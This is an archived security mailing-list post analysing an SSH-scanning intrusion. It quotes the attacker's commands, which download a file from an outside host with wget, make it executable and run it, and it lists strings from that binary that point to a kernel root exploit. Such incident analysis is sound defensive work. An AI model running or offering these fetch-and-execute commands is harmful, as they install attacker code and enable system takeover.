| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
From: BlueBoar at thievco.com (Blue Boar)
Subject: Betr.: RE: Automated ssh scanning
Todd Towles wrote:
> It could be, but he said it was patched. I didn't run the test of
> course.
>
> I never said it was the kernel however, it could be a service running.
> And unknown does not equal zero-day. But the tool got root and he
> doesn't know how. That is the point. Kernel, old service, whatever. It
> would be nice to find it.
If you take a look at this bit:
wget www.bo2k-rulez.net/a
chmod +x a
./a
The file "a" gives every superficial indication that it's a kernel
exploit, if you want to go by a 20-second Notepad analysis:
[-] Unable to exit, entering neverending loop.
Kernel seems not to be vulnerable double allocation
Unable to determine kernel address Unable to set up LDT
Unable to change page protection Invalid LDT entry Unable to jump
to call gate /bin/sh Unable to spawn shell
PATH=/usr/bin:/bin:/usr/sbin:/sbin Unable to
allocate memory Unable to unmap stack Unable to expand BSS
/proc/sys/kernel/osrelease FATAL: kernel too old
FATAL: cannot determine library version
/dev/null ;?..;?..(?..??..??.. malloc: using
debugging hooks
realloc(): invalid pointer %p!
malloc: top chunk is corrupt
Arena %d:
system bytes = %10u
in use bytes = %10u
Total (incl. mmap):
max mmap regions = %10u
max mmap bytes = %10lu
free(): invalid pointer %p!
TOP_PAD_ MMAP_MAX_ TRIM_THRESHOLD_ MMAP_THRESHOLD_
BB
Powered by blists - more mailing lists